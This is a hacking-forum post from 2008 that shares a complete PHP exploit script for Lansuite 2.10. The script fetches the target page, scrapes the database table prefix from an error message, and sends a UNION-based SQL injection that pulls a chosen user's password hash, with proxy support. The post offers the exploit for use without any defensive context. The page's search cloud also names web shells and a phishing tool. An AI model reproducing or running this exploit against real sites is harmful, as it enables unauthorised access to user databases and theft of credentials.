BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes

Notices

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 05-28-2008   #1 (permalink)
Hackerz Guru
 
Join Date: Feb 2008

Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 161 Times in 99 Posts
Rep Power: 0 Immortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond repute

Awards Showcase
Hall Of Fame 1K group 
Total Awards: 2

Send a message via MSN to Immortal Send a message via Yahoo to Immortal
Default Remote SQL Injection Exploit

Code:
<?
error_reporting(E_ERROR);

function xss_init()
{
    if (!extension_loaded('php_curl'))
    {
       if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll'))
       die ("oo error - cannot load curl extension!");
    }
}

function xss_header()
{
    echo "& #092;noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

oooooo";
    echo "                                  oo    ooooooo     ooooooo\n";
    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
    echo "                      888o888    888        o888   888888888\n";
    echo "                      o88888o    888     o888   o 888o   o888\n";
    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
    echo "oooooooooooooooooooooo lansuite 2.10 remote sql injection oooooooooooooooooooooo\n";
    echo "oo usage          $ php lansuite-210-exploit.php [url] [user id]\n";
    echo "oo proxy support  $ php lansuite-210-exploit.php [url] [user id] [proxy]:[port]\n";
    echo "oo example        $ php lansuite-210-exploit.php http://localhost 1\n";
    echo "oo print the password of the user\n\n";
}

function xss_bottom()
{
    echo "\noo developed for the [myg0t] online gaming group\n";
    echo "oo discover : x128 - alexander wilhelm - 24/02/2006\n";
    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net";
}

function xss_exploit()
{
    $xss_target = $_SERVER['argv'][1] . "/index.php";
    $xss_http_prefix_get = "?mod=board&action=forum&fid=x128";

    $xss_connection = curl_init();

    if ($_SERVER['argv'][3])
    {
        curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
        curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
    }

    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_prefix_get);
    curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
    curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');

    $xss_prefix_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
    
    $xss_prefix = substr(strstr($xss_prefix_source, "need_type FROM "), 15, strpos(strstr($xss_prefix_source, "need_type FROM "), "board_forums") - 15);
    
    $xss_http_get = "?mod=board&action=forum&fid=" . urlencode("0 UNION SELECT 1, 1, 1, 1, 1, 1, password, 1, 1, 1, 1 FROM ". $xss_prefix ."user WHERE userid = ". $_SERVER['argv'][2] ."/*");

    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);

    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");

    $xss_passwd = substr(strstr($xss_source, "b.userid WHERE pid = "), 21, 32);

    if ($_SERVER['argv'][2] && $xss_passwd)
    {
        echo "oo user           " . $_SERVER['argv'][2] . "\n";
        echo "oo password       " . $xss_passwd . "\n\n";
        echo "oo dafaced ...\n";
    }
    curl_close ($xss_connection);
}

xss_init();
xss_header();
xss_exploit();
xss_bottom();
?>
Immortal is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote

Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit Armageddon Exploit Codes 0 08-08-2008 01:20 PM
ipbProArcade 2.5.1 (user) Remote SQL Injection Exploit RampageX11 Exploit Codes 2 06-08-2008 05:45 AM
Vubb Forum Rc1 (m) Remote Sql Injection Exploit Immortal Exploit Codes 0 05-28-2008 10:19 PM
StanWeb.CMS (default.asp id) Remote SQL Injection Exploit Intruder Exploit Codes 0 05-28-2008 02:08 AM
phpBB 3 Remote SQL Injection Exploit KnightRider Exploit Codes 2 05-24-2008 07:52 AM

These are the 100 most searched terms
Search Cloud
(intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack bad hackerz badgewinners.com badhackerz badhackerz.com c99shell c99shell powered by admin c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm cousin ki chudai dhcp sniffer eset nod32 rapidshare evan poczik evllp.dll free tamil sex stories hotmail phisher idm 512 infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare nod32 rapidshare.com pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rapidshare rosetta stone rosetta stone application rosetta stone rapidshare rosetta stone romanian rosetta stone update safe-mode: off (not secure) drwxrwxrwx c99shell sigma 1.7 softjtag tamil sex stories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 11:18 AM.


Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios